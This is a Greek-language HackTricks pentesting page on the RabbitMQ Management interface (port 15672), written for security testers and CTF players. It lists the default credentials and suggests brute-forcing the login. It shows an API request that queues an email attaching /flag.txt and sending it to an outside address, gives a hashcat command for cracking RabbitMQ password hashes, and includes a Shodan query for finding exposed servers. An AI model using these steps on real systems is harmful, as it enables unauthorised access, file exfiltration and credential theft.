6.9 KiB
15672 - Ελεγχος Εισβολής στη Διαχείριση του RabbitMQ
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Ερυθρός Συνεργάτης της Ομάδας HackTricks στο AWS)!
Άλλοι τρόποι υποστήριξης των HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας διαφημισμένη στα HackTricks ή να κατεβάσετε τα HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα τηλεγραφήματος ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Συμβουλή για bug bounty: Εγγραφείτε στο Intigriti, μια πρεμιέρα πλατφόρμα bug bounty δημιουργημένη από χάκερς, για χάκερς! Γίνετε μέλος στο https://go.intigriti.com/hacktricks σήμερα, και αρχίστε να κερδίζετε αμοιβές έως και $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
Βασικές Πληροφορίες
Μπορείτε να μάθετε περισσότερα για το RabbitMQ στο 5671,5672 - Ελεγχος Εισβολής στο AMQP.
Σε αυτή τη θύρα μπορείτε να βρείτε τον διακεκριμένο διακομιστή RabbitMQ Management εάν το πρόσθετο διαχείρισης είναι ενεργοποιημένο.
Η κύρια σελίδα θα πρέπει να μοιάζει με αυτήν:
Απαρίθμηση
Οι προεπιλεγμένες διαπιστευτήρια είναι "guest":"guest". Αν δεν λειτουργούν, μπορείτε να δοκιμάσετε να εκτελέσετε βίαιη εισβολή στην είσοδο.
Για να ξεκινήσετε χειροκίνητα αυτή την ενότητα πρέπει να εκτελέσετε:
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart
Αφού έχετε ελέγξει σωστά τα διαπιστευτήριά σας, θα δείτε τη διαχειριστική κονσόλα:
Επίσης, αν έχετε έγκυρα διαπιστευτήρια, μπορεί να σας ενδιαφέρει η πληροφορία του http://localhost:15672/api/connections
Σημειώστε επίσης ότι είναι δυνατόν να δημοσιεύσετε δεδομένα μέσα σε μια ουρά χρησιμοποιώντας το API αυτής της υπηρεσίας με ένα αίτημα όπως:
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
Αποκωδικοποίηση Hash
echo <base64 rabbit mq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt
hashcat -m 1420 --hex-salt hash.txt wordlist
Shodan
port:15672 http
Συμβουλή για ανταμοιβή ευρημάτων προβλημάτων: Εγγραφείτε στο Intigriti, μια πρεμιέρα πλατφόρμα ανταμοιβής ευρημάτων προβλημάτων δημιουργημένη από χάκερς, για χάκερς! Γίνετε μέλος στο https://go.intigriti.com/hacktricks σήμερα, και αρχίστε να κερδίζετε ανταμοιβές μέχρι $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι υποστήριξης του HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας διαφημισμένη στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα τηλεγραφήματος ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.